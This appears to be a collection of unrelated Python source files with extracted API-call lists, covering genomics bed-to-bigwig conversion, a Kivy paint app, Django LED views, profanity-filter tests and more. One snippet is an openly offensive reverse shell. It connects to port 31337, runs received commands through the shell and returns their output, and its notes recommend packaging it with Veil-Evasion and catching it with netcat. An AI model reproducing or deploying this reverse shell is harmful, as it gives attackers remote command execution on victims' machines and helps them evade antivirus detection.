     (6) mod sites, (7) unmod sites, (8) adjusted probability]

    Only the chromosome/start/stop/mod_probability columns are retained,
    which is all the bigwig conversion needs.

    :param bed: Name of bed file. (str)
    :param pileup_mode: Site modification calling method. (str: "model", "count")
    :return df: Pandas dataframe with columns chromosome, start, stop, mod_probability.
    :raises ValueError: If pileup_mode is not "count" or "model".
    """
    logging.debug("make_bed_df: Converting '{}' to pandas dataframe.\n".format(bed))
    if pileup_mode == "count":
        extra_columns = ['modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score']
    elif pileup_mode == "model":
        extra_columns = ['modified_bases', 'unmodified_bases', 'adj_prob']
    else:
        # previously fell through to an UnboundLocalError; fail loudly instead
        raise ValueError("pileup_mode must be 'count' or 'model', got: {}".format(pileup_mode))
    names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage'] + extra_columns
    df = pd.read_csv(bed, sep='\t', header=None, names=names)
    # keep only the columns needed for bigwig conversion
    df.drop(columns=extra_columns + ['haplotype', 'coverage'], inplace=True)
    return df
def get_bigwig_header_info(input_fasta):
    """
    Collect chromosome names and lengths from a reference fasta.

    :param input_fasta: Name of reference fasta file. (str)
    :return header: List of (ref name, length) tuples,
        e.g. [(ref1, length1), (ref2, length2), ...]. (list)
    """
    logging.debug("get_bigwig_header_info: Getting ref:length info from reference fasta.\n")
    with open(input_fasta) as fasta_handle:
        return [(record.id, len(record.seq)) for record in SeqIO.parse(fasta_handle, "fasta")]
def write_bigwig_from_df(df, header, outname):
    """
    Write a bigwig file from a bed-derived pandas dataframe.

    :param df: Pandas dataframe object (created from a bed file).
    :param header: List of (ref name, length) tuples for the reference. (list)
    :param outname: Name of the bigwig output file to write (OUT.bw). (str)
    :raises ValueError: If no reference contig names match between df and header.
    """
    logging.debug("write_bigwig_from_df: Writing bigwig file for '{}'.\n".format(outname))
    # restrict the header to contigs that actually occur in the bed data,
    # and sort the remaining contigs by name
    chroms_present = list(df["chromosome"].unique())
    filtered_header = sorted((entry for entry in header if entry[0] in chroms_present), key=itemgetter(0))
    for contig_name, contig_length in filtered_header:
        logging.debug("\tHeader includes: '{}', '{}'.".format(contig_name, contig_length))
    # nothing matched: the bed file and fasta disagree on contig naming
    if not filtered_header:
        logging.error("No reference contig names match between bed file and reference fasta!")
        raise ValueError("No reference contig names match between bed file and reference fasta!")
    # bigwig objects are read-only by default; open in write mode
    bw = pyBigWig.open(outname, "w")
    # the header must be registered before any entries can be added
    bw.addHeader(filtered_header)
    for chrom, length in filtered_header:
        logging.debug("\tAdding entries for '{}'.".format(chrom))
        chrom_df = df[df["chromosome"] == chrom]
        logging.debug("\tNumber of entries = {:,}.".format(chrom_df.shape[0]))
        # pyBigWig expects parallel lists:
        #   chroms ["chr1", ...], starts [1, ...], ends=[6, ...], values=[0.0, ...]
        bw.addEntries(list(chrom_df["chromosome"]),
                      list(chrom_df["start"]),
                      ends=list(chrom_df["stop"]),
                      values=list(chrom_df["mod_probability"]))
        logging.debug("\tFinished entries for '{}'.\n".format(chrom))
    bw.close()
def convert_bed_to_bigwig(bed_files, fasta, pileup_mode):
    """
    Produce one bigwig file per output bed file.

    :param bed_files: List of output bed file names. (list)
    :param fasta: Path to the reference fasta file. (str)
    :param pileup_mode: Site modification calling method. (str: "model", "count")
    """
    logging.info("convert_bed_to_bigwig: Converting {} bed files to bigwig files.\n".format(len(bed_files)))
    header = get_bigwig_header_info(fasta)
    for bed in bed_files:
        # OUT.bed -> OUT.bw
        bigwig_name = "{}.bw".format(bed.split(".bed")[0])
        write_bigwig_from_df(make_bed_df(bed, pileup_mode), header, bigwig_name)
def main():
    """
    Entry point: parse arguments, chunk the reference into regions, run the
    parallel pileup processing, and write bed and bigwig output files.

    :raises ValueError: If model-based scoring is requested without a valid
        model directory.
    """
    args = get_args()
    setup_logging(args.output_label)
    log_args(args)
    # model-based scoring requires a valid model directory up front
    if args.pileup_mode == "model":
        # idiom fix: compare to None with `is`, not `==`
        if args.model_dir is None:
            logging.error("Must supply a model to use when running model-based scoring!")
            raise ValueError("Must supply a model to use when running model-based scoring!")
        elif not os.path.isdir(args.model_dir):
            logging.error("{} is not a valid directory path!".format(args.model_dir))
            raise ValueError("{} is not a valid directory path!".format(args.model_dir))
    print("\nChunking regions for multiprocessing.")
    regions_to_process = get_regions_to_process(args.bam, args.fasta, args.chunksize, args.modsites,
                                                args.pileup_mode, args.model_dir, args.min_mapq, args.hap_tag)
    print("Running multiprocessing on {:,} chunks.".format(len(regions_to_process)))
    bed_results = run_all_pileup_processing(regions_to_process, args.threads)
    print("Finished multiprocessing.\nWriting bed files.")
    bed_files = write_output_bed(args.output_label, args.modsites, args.min_coverage, bed_results)
    print("Writing bigwig files.")
    convert_bed_to_bigwig(bed_files, args.fasta, args.pileup_mode)
    print("Finished.\n")


if __name__ == '__main__':
    main()
|
[
"os.remove",
"Bio.Seq.Seq",
"argparse.ArgumentParser",
"pandas.read_csv",
"re.finditer",
"numpy.clip",
"numpy.histogram",
"numpy.linalg.norm",
"pandas.DataFrame",
"logging.error",
"sys.stderr.isatty",
"os.path.exists",
"numpy.append",
"numpy.swapaxes",
"collections.Counter",
"numpy.stack",
"tensorflow.keras.models.load_model",
"Bio.SeqIO.parse",
"os.stat",
"pysam.AlignmentFile",
"numpy.lib.stride_tricks.sliding_window_view",
"logging.debug",
"os.getpid",
"logging.basicConfig",
"os.path.isdir",
"logging.info",
"pyBigWig.open",
"operator.itemgetter",
"logging.getLogger"
] |
[((519, 801), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""aligned_bam_to_cpg_scores.py"""', 'description': '"""Calculate CpG positions and scores from an aligned bam file. Outputs raw and \n coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available)."""'}), '(prog=\'aligned_bam_to_cpg_scores.py\', description=\n """Calculate CpG positions and scores from an aligned bam file. Outputs raw and \n coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available)."""\n )\n', (542, 801), False, 'import argparse\n'), ((4240, 4263), 'os.path.exists', 'os.path.exists', (['logname'], {}), '(logname)\n', (4254, 4263), False, 'import os\n'), ((4326, 4472), 'logging.basicConfig', 'logging.basicConfig', ([], {'filename': 'logname', 'format': '"""%(asctime)s: %(levelname)s: %(message)s"""', 'datefmt': '"""%d-%b-%y %H:%M:%S"""', 'level': 'logging.DEBUG'}), "(filename=logname, format=\n '%(asctime)s: %(levelname)s: %(message)s', datefmt='%d-%b-%y %H:%M:%S',\n level=logging.DEBUG)\n", (4345, 4472), False, 'import logging\n'), ((4619, 4669), 'logging.info', 'logging.info', (['"""Using following argument settings:"""'], {}), "('Using following argument settings:')\n", (4631, 4669), False, 'import logging\n'), ((5830, 5888), 'logging.info', 'logging.info', (['"""get_regions_to_process: Starting chunking."""'], {}), "('get_regions_to_process: Starting chunking.')\n", (5842, 5888), False, 'import logging\n'), ((5942, 5978), 'pysam.AlignmentFile', 'pysam.AlignmentFile', (['input_bam', '"""rb"""'], {}), "(input_bam, 'rb')\n", (5961, 5978), False, 'import pysam\n'), ((31278, 31330), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['model_dir'], {'compile': '(False)'}), '(model_dir, compile=False)\n', (31304, 31330), True, 'import tensorflow as tf\n'), ((34891, 34927), 'pysam.AlignmentFile', 'pysam.AlignmentFile', (['input_bam', '"""rb"""'], {}), 
"(input_bam, 'rb')\n", (34910, 34927), False, 'import pysam\n'), ((36951, 37025), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Starting parallel processing.\n"""'], {}), "('run_all_pileup_processing: Starting parallel processing.\\n')\n", (36963, 37025), False, 'import logging\n'), ((37077, 37096), 'sys.stderr.isatty', 'sys.stderr.isatty', ([], {}), '()\n', (37094, 37096), False, 'import sys\n'), ((37703, 37777), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Finished parallel processing.\n"""'], {}), "('run_all_pileup_processing: Finished parallel processing.\\n')\n", (37715, 37777), False, 'import logging\n'), ((38123, 38198), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Starting sort for bed results.\n"""'], {}), "('run_all_pileup_processing: Starting sort for bed results.\\n')\n", (38135, 38198), False, 'import logging\n'), ((39637, 39709), 'logging.info', 'logging.info', (['"""write_output_bed: Writing unfiltered output bed files.\n"""'], {}), "('write_output_bed: Writing unfiltered output bed files.\\n')\n", (39649, 39709), False, 'import logging\n'), ((43792, 43885), 'logging.debug', 'logging.debug', (['"""get_bigwig_header_info: Getting ref:length info from reference fasta.\n"""'], {}), "(\n 'get_bigwig_header_info: Getting ref:length info from reference fasta.\\n')\n", (43805, 43885), False, 'import logging\n'), ((45335, 45362), 'pyBigWig.open', 'pyBigWig.open', (['outname', '"""w"""'], {}), "(outname, 'w')\n", (45348, 45362), False, 'import pyBigWig\n'), ((4273, 4291), 'os.remove', 'os.remove', (['logname'], {}), '(logname)\n', (4282, 4291), False, 'import os\n'), ((7315, 7339), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fh', '"""fasta"""'], {}), "(fh, 'fasta')\n", (7326, 7339), False, 'from Bio import SeqIO\n'), ((24544, 24604), 'pandas.DataFrame', 'pd.DataFrame', (['modinfoList'], {'columns': "['strand', 'prob', 'hap']"}), "(modinfoList, columns=['strand', 'prob', 'hap'])\n", (24556, 24604), True, 
'import pandas as pd\n'), ((26235, 26255), 'numpy.linalg.norm', 'np.linalg.norm', (['hist'], {}), '(hist)\n', (26249, 26255), True, 'import numpy as np\n'), ((26435, 26462), 'numpy.append', 'np.append', (['(hist / norm)', 'adj'], {}), '(hist / norm, adj)\n', (26444, 26462), True, 'import numpy as np\n'), ((29027, 29067), 'numpy.lib.stride_tricks.sliding_window_view', 'sliding_window_view', (['featPad', '(11)'], {'axis': '(0)'}), '(featPad, 11, axis=0)\n', (29046, 29067), False, 'from numpy.lib.stride_tricks import sliding_window_view\n'), ((29094, 29127), 'numpy.swapaxes', 'np.swapaxes', (['featuresWindow', '(1)', '(2)'], {}), '(featuresWindow, 1, 2)\n', (29105, 29127), True, 'import numpy as np\n'), ((29195, 29217), 'numpy.clip', 'np.clip', (['predict', '(0)', '(1)'], {}), '(predict, 0, 1)\n', (29202, 29217), True, 'import numpy as np\n'), ((38294, 38369), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Finished sort for bed results.\n"""'], {}), "('run_all_pileup_processing: Finished sort for bed results.\\n')\n", (38306, 38369), False, 'import logging\n'), ((40264, 40281), 'os.path.exists', 'os.path.exists', (['f'], {}), '(f)\n', (40278, 40281), False, 'import os\n'), ((42671, 42867), 'pandas.read_csv', 'pd.read_csv', (['bed'], {'sep': '"""\t"""', 'header': 'None', 'names': "['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',\n 'modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score']"}), "(bed, sep='\\t', header=None, names=['chromosome', 'start',\n 'stop', 'mod_probability', 'haplotype', 'coverage', 'modified_bases',\n 'unmodified_bases', 'mod_score', 'unmod_score'])\n", (42682, 42867), True, 'import pandas as pd\n'), ((43953, 43977), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fh', '"""fasta"""'], {}), "(fh, 'fasta')\n", (43964, 43977), False, 'from Bio import SeqIO\n'), ((45071, 45162), 'logging.error', 'logging.error', (['"""No reference contig names match between bed file and reference fasta!"""'], {}), "(\n 'No 
reference contig names match between bed file and reference fasta!')\n", (45084, 45162), False, 'import logging\n'), ((26174, 26216), 'numpy.histogram', 'np.histogram', (['probs'], {'bins': '(20)', 'range': '[0, 1]'}), '(probs, bins=20, range=[0, 1])\n', (26186, 26216), True, 'import numpy as np\n'), ((28916, 28936), 'numpy.stack', 'np.stack', (['normhistos'], {}), '(normhistos)\n', (28924, 28936), True, 'import numpy as np\n'), ((31004, 31035), 'logging.getLogger', 'logging.getLogger', (['"""tensorflow"""'], {}), "('tensorflow')\n", (31021, 31035), False, 'import logging\n'), ((40295, 40307), 'os.remove', 'os.remove', (['f'], {}), '(f)\n', (40304, 40307), False, 'import os\n'), ((41321, 41337), 'os.remove', 'os.remove', (['inBed'], {}), '(inBed)\n', (41330, 41337), False, 'import os\n'), ((43099, 43279), 'pandas.read_csv', 'pd.read_csv', (['bed'], {'sep': '"""\t"""', 'header': 'None', 'names': "['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',\n 'modified_bases', 'unmodified_bases', 'adj_prob']"}), "(bed, sep='\\t', header=None, names=['chromosome', 'start',\n 'stop', 'mod_probability', 'haplotype', 'coverage', 'modified_bases',\n 'unmodified_bases', 'adj_prob'])\n", (43110, 43279), True, 'import pandas as pd\n'), ((44867, 44880), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (44877, 44880), False, 'from operator import itemgetter\n'), ((47175, 47252), 'logging.error', 'logging.error', (['"""Must supply a model to use when running model-based scoring!"""'], {}), "('Must supply a model to use when running model-based scoring!')\n", (47188, 47252), False, 'import logging\n'), ((9548, 9576), 're.finditer', 're.finditer', (['base', 'query_seq'], {}), '(base, query_seq)\n', (9559, 9576), False, 'import re\n'), ((38268, 38284), 'operator.itemgetter', 'itemgetter', (['(0)', '(1)'], {}), '(0, 1)\n', (38278, 38284), False, 'from operator import itemgetter\n'), ((41280, 41294), 'os.stat', 'os.stat', (['inBed'], {}), '(inBed)\n', 
(41287, 41294), False, 'import os\n'), ((41787, 41804), 'os.remove', 'os.remove', (['covBed'], {}), '(covBed)\n', (41796, 41804), False, 'import os\n'), ((47379, 47408), 'os.path.isdir', 'os.path.isdir', (['args.model_dir'], {}), '(args.model_dir)\n', (47392, 47408), False, 'import os\n'), ((36198, 36209), 'os.getpid', 'os.getpid', ([], {}), '()\n', (36207, 36209), False, 'import os\n'), ((41741, 41756), 'os.stat', 'os.stat', (['covBed'], {}), '(covBed)\n', (41748, 41756), False, 'import os\n'), ((9806, 9820), 'Bio.Seq.Seq', 'Seq', (['query_seq'], {}), '(query_seq)\n', (9809, 9820), False, 'from Bio.Seq import Seq\n'), ((19141, 19151), 'collections.Counter', 'Counter', (['v'], {}), '(v)\n', (19148, 19151), False, 'from collections import Counter\n')]
|
import numpy as np
def get_monthly_rate(rate) -> float:
    """
    Convert a yearly interest rate into the equivalent monthly rate.

    The monthly growth factor is the 12th root of the yearly growth
    factor, so compounding it twelve times reproduces the yearly rate.

    :param float rate: the yearly interest rate (e.g. 0.05 for 5%)
    :return: the monthly interest rate
    """
    yearly_growth = rate + 1
    monthly_growth = np.power(yearly_growth, 1. / 12)
    return monthly_growth - 1
|
[
"numpy.power"
] |
[((343, 374), 'numpy.power', 'np.power', (['growth_year', '(1.0 / 12)'], {}), '(growth_year, 1.0 / 12)\n', (351, 374), True, 'import numpy as np\n')]
|
# Open a reverse shell when executed on a victim computer.
import socket
import subprocess
HOST = "127.0.0.1"
PORT = 31337
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockobj.connect((HOST, PORT))
while 1:
data = sockobj.recv(4096) # returns a bytes object
# don't forget to decode the bytes to str
proc = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sockobj.send(result)
# sockobj.close() # unreachable code
# Veil-Evasion make .py to .exe
# auxilary/pyinstaller-wrapper
# connect to nc (Windows)
# nc -L -p 31337 -v
|
[
"socket.socket"
] |
[((136, 185), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (149, 185), False, 'import socket\n')]
|
########################################################################
## SPINN DESIGN CODE
# YOUTUBE: (SPINN TV) https://www.youtube.com/spinnTv
# WEBSITE: spinndesign.com
# TUTORIAL: KIVY
########################################################################
########################################################################
## IMPORTS
########################################################################
from random import random
# Import kivy app
from kivy.app import App
# Import kivy widget
from kivy.uix.widget import Widget
# Import kivy button
from kivy.uix.button import Button
# Import graphics
from kivy.graphics import Color, Ellipse, Line
########################################################################
## PAINT WIDGET CLASS
########################################################################
class MyPaintWidget(Widget):
    """Canvas widget that draws colored strokes following touch input."""

    def on_touch_down(self, touch):
        """Start a stroke: draw an ellipse at the touch point in a random hue."""
        hsv_color = (random(), 1, 1)
        with self.canvas:
            Color(*hsv_color, mode='hsv')
            # ellipse diameter, centered on the touch point
            diameter = 30.
            Ellipse(pos=(touch.x - diameter / 2, touch.y - diameter / 2), size=(diameter, diameter))
            # remember the line so on_touch_move can keep extending it
            touch.ud['line'] = Line(points=(touch.x, touch.y))

    def on_touch_move(self, touch):
        """Extend the current stroke as the touch moves."""
        touch.ud['line'].points += [touch.x, touch.y]
########################################################################
## MAIN CLASS
########################################################################
class MyPaintApp(App):
    """Simple paint application with a clear-canvas button."""

    def build(self):
        """Assemble the root widget tree: painter canvas plus a Clear button."""
        root = Widget()
        self.painter = MyPaintWidget()
        clear_button = Button(text='Clear')
        # wire the button to wipe the canvas
        clear_button.bind(on_release=self.clear_canvas)
        root.add_widget(self.painter)
        root.add_widget(clear_button)
        return root

    def clear_canvas(self, obj):
        """Erase everything drawn on the painter canvas."""
        self.painter.canvas.clear()
########################################################################
## RUN THE APP
########################################################################
# Launch the paint application only when executed as a script.
if __name__ == '__main__':
    MyPaintApp().run()
########################################################################
## <== END ==>
########################################################################
|
[
"kivy.graphics.Line",
"kivy.graphics.Ellipse",
"kivy.uix.button.Button",
"random.random",
"kivy.graphics.Color",
"kivy.uix.widget.Widget"
] |
[((1776, 1784), 'kivy.uix.widget.Widget', 'Widget', ([], {}), '()\n', (1782, 1784), False, 'from kivy.uix.widget import Widget\n'), ((1895, 1915), 'kivy.uix.button.Button', 'Button', ([], {'text': '"""Clear"""'}), "(text='Clear')\n", (1901, 1915), False, 'from kivy.uix.button import Button\n'), ((1006, 1014), 'random.random', 'random', ([], {}), '()\n', (1012, 1014), False, 'from random import random\n'), ((1078, 1103), 'kivy.graphics.Color', 'Color', (['*color'], {'mode': '"""hsv"""'}), "(*color, mode='hsv')\n", (1083, 1103), False, 'from kivy.graphics import Color, Ellipse, Line\n'), ((1194, 1254), 'kivy.graphics.Ellipse', 'Ellipse', ([], {'pos': '(touch.x - d / 2, touch.y - d / 2)', 'size': '(d, d)'}), '(pos=(touch.x - d / 2, touch.y - d / 2), size=(d, d))\n', (1201, 1254), False, 'from kivy.graphics import Color, Ellipse, Line\n'), ((1333, 1364), 'kivy.graphics.Line', 'Line', ([], {'points': '(touch.x, touch.y)'}), '(points=(touch.x, touch.y))\n', (1337, 1364), False, 'from kivy.graphics import Color, Ellipse, Line\n')]
|
from copy import deepcopy
from dataclasses import dataclass
from parseridge.utils.logger import LoggerMixin
"""
TODO
[ ] Group the parameters
[ ] Add save to / load from YAML
[x] Add overwrite method from kwargs
"""
@dataclass
class Hyperparameters(LoggerMixin):
    """Container for the hyper-parameters used in the training process.

    Bundling them here keeps the trainer code clean.
    """

    learning_rate: float = 1e-3
    batch_size: int = 4
    error_probability: float = 0.1
    oov_probability: float = 0.25
    margin_threshold: float = 2.5
    token_dropout: float = 0.01
    loss_function: str = "CrossEntropy"  # See Criterion.LOSS_FUNCTIONS

    def update(self, **kwargs):
        """Return a deep copy of this object with the given fields replaced.

        Private (underscore-prefixed) or unknown names are skipped with a
        warning; the original object is left untouched.
        """
        clone = deepcopy(self)
        for parameter_name, value in kwargs.items():
            is_public = not parameter_name.startswith("_")
            if is_public and hasattr(clone, parameter_name):
                setattr(clone, parameter_name, value)
            else:
                self.logger.warning(f"Cannot update value for '{parameter_name}'.")
        return clone
|
[
"copy.deepcopy"
] |
[((744, 758), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (752, 758), False, 'from copy import deepcopy\n')]
|
import pytest
from profanity.templatetags.profanity import censor
@pytest.mark.parametrize("word", ["fuck", "shit", "cunt", "ass"])
def test_censors_profane_words(word):
    """A profane word is replaced by asterisks of the same length."""
    expected = "*" * len(word)
    assert censor(word) == expected
@pytest.mark.parametrize("word", ["fudge", "poop", "baddie", "butt"])
def test_does_not_censor_other_words(word):
    """A harmless word passes through censoring unchanged."""
    result = censor(word)
    assert result == word
@pytest.mark.parametrize(
    "sentence",
    [
        "Fuck you!",
        "You are a piece of shit",
        "Wow, what a cunt.",
        "Thanks for being an asshole",
    ],
)
def test_censors_words_in_sentences(sentence):
    """A sentence containing profanity gains at least one asterisk."""
    censored = censor(sentence)
    assert "*" in censored
@pytest.mark.parametrize(
    "sentence",
    [
        "Screw you!",
        "You are a bad person",
        "Wow, what a doodoo head",
        "Thanks for being a meanie",
    ],
)
def test_does_not_censor_other_words_in_sentences(sentence):
    """A clean sentence is returned verbatim."""
    censored = censor(sentence)
    assert censored == sentence
|
[
"pytest.mark.parametrize",
"profanity.templatetags.profanity.censor"
] |
[((69, 133), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""word"""', "['fuck', 'shit', 'cunt', 'ass']"], {}), "('word', ['fuck', 'shit', 'cunt', 'ass'])\n", (92, 133), False, 'import pytest\n'), ((220, 288), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""word"""', "['fudge', 'poop', 'baddie', 'butt']"], {}), "('word', ['fudge', 'poop', 'baddie', 'butt'])\n", (243, 288), False, 'import pytest\n'), ((368, 501), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""sentence"""', "['Fuck you!', 'You are a piece of shit', 'Wow, what a cunt.',\n 'Thanks for being an asshole']"], {}), "('sentence', ['Fuck you!', 'You are a piece of shit',\n 'Wow, what a cunt.', 'Thanks for being an asshole'])\n", (391, 501), False, 'import pytest\n'), ((633, 768), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""sentence"""', "['Screw you!', 'You are a bad person', 'Wow, what a doodoo head',\n 'Thanks for being a meanie']"], {}), "('sentence', ['Screw you!', 'You are a bad person',\n 'Wow, what a doodoo head', 'Thanks for being a meanie'])\n", (656, 768), False, 'import pytest\n'), ((183, 195), 'profanity.templatetags.profanity.censor', 'censor', (['word'], {}), '(word)\n', (189, 195), False, 'from profanity.templatetags.profanity import censor\n'), ((344, 356), 'profanity.templatetags.profanity.censor', 'censor', (['word'], {}), '(word)\n', (350, 356), False, 'from profanity.templatetags.profanity import censor\n'), ((613, 629), 'profanity.templatetags.profanity.censor', 'censor', (['sentence'], {}), '(sentence)\n', (619, 629), False, 'from profanity.templatetags.profanity import censor\n'), ((899, 915), 'profanity.templatetags.profanity.censor', 'censor', (['sentence'], {}), '(sentence)\n', (905, 915), False, 'from profanity.templatetags.profanity import censor\n')]
|
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
import json
from .models import Color, Board, LED
def index(request):
    """Homepage: show the current board (if any) and the color/board pickers.

    Reads the optional session keys ``current_color`` and ``current_board``
    (set by ``color_click`` / ``board_click``). Fix: the original used two
    bare ``except:`` clauses that swallowed every error; missing session
    keys are now handled with ``session.get`` and only a stale board label
    is caught with ``Board.DoesNotExist``.
    """
    all_colors = Color.objects.all()  # change to selected colors
    all_boards = Board.objects.all()  # change to selected boards
    # Session keys may be absent on a first visit; default to None.
    current_color_label = request.session.get('current_color')
    current_board_label = request.session.get('current_board')
    current_board = None
    current_arr = None
    if current_board_label is not None:
        try:
            current_board = Board.objects.get(label=current_board_label)
            current_arr = current_board.display_arr()
        except Board.DoesNotExist:
            # Stale or placeholder label (e.g. 'none'); render without a board.
            current_board = None
            current_arr = None
    context = {
        'current_arr': current_arr,
        'colors': all_colors,
        'boards': all_boards,
        'current_color': current_color_label,
        'current_board': current_board
    }
    return render(request, 'leds/index.html', context)
def color(request, color_name):
    """Displays information for a given color (404 if the label is unknown)."""
    requested = get_object_or_404(Color, label=color_name)
    return render(request, 'leds/color.html', {'color': requested})
def board(request, board_label):
    """Displays information for a given board (404 if the label is unknown)."""
    requested = get_object_or_404(Board, label=board_label)
    context = {
        'board': requested,
        'arr': requested.display_arr(),
    }
    return render(request, 'leds/board.html', context)
def all_colors(request):
    """Show all the colors."""
    context = {'all_colors': Color.objects.all()}
    return render(request, 'leds/all_colors.html', context)
def all_boards(request):
    """Show all boards."""
    context = {'all_boards': Board.objects.all()}
    return render(request, 'leds/all_boards.html', context)
def set_led_color(request, board_label, led_idx, color_label):
    """Set one LED on a board to the given color, then redirect to the board page."""
    target_board = Board.objects.get(label=board_label)
    # NOTE(review): assumes board.leds supports integer indexing — verify model.
    target_led = target_board.leds[led_idx]
    target_led.color = Color.objects.get(label=color_label)
    target_led.save()
    return HttpResponseRedirect(reverse('leds:boards', args=(board_label,)))
# session testing
def selected_color(request):
    """Return the Color selected in the session, or None.

    The session stores the string 'none' when nothing is selected.
    Raises KeyError if 'current_color' was never set.
    """
    label = request.session['current_color']
    if label == 'none':
        return None
    return Color.objects.get(label=label)
def LED_click(request, led_index):
    """An LED in a board was clicked: paint it with the selected color.

    Looks up the session's ``current_color`` and ``current_board``; if either
    is missing/unset the click is a no-op. Fix: the original used a bare
    ``except:`` — now a missing session key is handled with ``session.get``
    and only ``Board.DoesNotExist`` is caught on the lookup.
    """
    # Find the color currently selected in the session (may be None).
    color = selected_color(request)
    # Resolve the board currently displayed in the session, if any.
    board = None
    board_label = request.session.get('current_board')
    if board_label is not None:
        try:
            board = Board.objects.get(label=board_label)
        except Board.DoesNotExist:
            board = None
    if color is not None and board is not None:
        # Find the LED associated to the clicked button (by index and board).
        led = LED.objects.get(index=led_index, board=board)
        led.color = color
        led.save()
        print('set ', led_index, ' to ', color)
    # Return to the original page.
    return HttpResponseRedirect(reverse('leds:index'))
def color_click(request, color_label):
    """A displayed color was clicked: toggle it as the session selection.

    Clicking the already-selected color deselects it (stores 'none').
    """
    color = Color.objects.get(label=color_label)
    # color.json() serializes the instance; read the label back from it.
    obj = json.loads(color.json())[0]
    label = obj.get('fields').get('label')
    # Idiom fix: 'x not in d' instead of 'not x in d'.
    if 'current_color' not in request.session:
        # NOTE(review): a first click only initializes the key to 'none'
        # instead of selecting the color — confirm this is intended.
        request.session['current_color'] = 'none'
    elif request.session['current_color'] == label:
        # Re-clicking the selected color clears the selection.
        request.session['current_color'] = 'none'
    else:
        request.session['current_color'] = label
    return HttpResponseRedirect(reverse('leds:index'))
def board_click(request, board_label):
    """A displayed board was clicked: toggle it as the session selection.

    Clicking the already-selected board deselects it (stores 'none').
    """
    board = Board.objects.get(label=board_label)
    # board.json() serializes the instance; read the label back from it.
    obj = json.loads(board.json())[0]
    label = obj.get('fields').get('label')
    # Idiom fix: 'x not in d' instead of 'not x in d'.
    if 'current_board' not in request.session:
        # NOTE(review): a first click only initializes the key to 'none'
        # instead of selecting the board — confirm this is intended.
        request.session['current_board'] = 'none'
    elif request.session['current_board'] == label:
        # Re-clicking the selected board clears the selection.
        request.session['current_board'] = 'none'
    else:
        request.session['current_board'] = label
    return HttpResponseRedirect(reverse('leds:index'))
|
[
"django.shortcuts.render",
"django.shortcuts.get_object_or_404",
"django.urls.reverse"
] |
[((967, 1010), 'django.shortcuts.render', 'render', (['request', '"""leds/index.html"""', 'context'], {}), "(request, 'leds/index.html', context)\n", (973, 1010), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1105, 1147), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Color'], {'label': 'color_name'}), '(Color, label=color_name)\n', (1122, 1147), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1204, 1247), 'django.shortcuts.render', 'render', (['request', '"""leds/color.html"""', 'context'], {}), "(request, 'leds/color.html', context)\n", (1210, 1247), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1343, 1386), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Board'], {'label': 'board_label'}), '(Board, label=board_label)\n', (1360, 1386), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1473, 1516), 'django.shortcuts.render', 'render', (['request', '"""leds/board.html"""', 'context'], {}), "(request, 'leds/board.html', context)\n", (1479, 1516), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1680, 1728), 'django.shortcuts.render', 'render', (['request', '"""leds/all_colors.html"""', 'context'], {}), "(request, 'leds/all_colors.html', context)\n", (1686, 1728), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1872, 1920), 'django.shortcuts.render', 'render', (['request', '"""leds/all_boards.html"""', 'context'], {}), "(request, 'leds/all_boards.html', context)\n", (1878, 1920), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2185, 2228), 'django.urls.reverse', 'reverse', (['"""leds:boards"""'], {'args': '(board_label,)'}), "('leds:boards', args=(board_label,))\n", (2192, 2228), False, 'from django.urls import reverse\n'), ((3248, 3269), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (3255, 3269), False, 'from django.urls import reverse\n'), ((3853, 
3874), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (3860, 3874), False, 'from django.urls import reverse\n'), ((4462, 4483), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (4469, 4483), False, 'from django.urls import reverse\n')]
|
import numpy as np, pyemma as py
# from msmbuilder.decomposition.tica import tICA
from sklearn.kernel_approximation import Nystroem
class Kernel_tica(object):
    """tICA on a Nystroem (RBF-kernel) feature map.

    Input sequences are transformed with a Nystroem kernel approximation and
    tICA is then fitted on the transformed data, optionally with Koopman
    reweighting (see Wu, Hao, et al., "Variational Koopman models", J. Chem.
    Phys. 146.15 (2017): 154104).
    """

    def __init__(self, n_components, lag_time,
                 gamma,  # gamma value for rbf kernel
                 n_components_nystroem=100,  # number of components for Nystroem kernel approximation
                 landmarks=None,   # optional landmark points for the Nystroem fit
                 shrinkage=None,
                 weights='empirical'  # if 'koopman', use Koopman reweighting for tICA
                 ):
        self._n_components = n_components
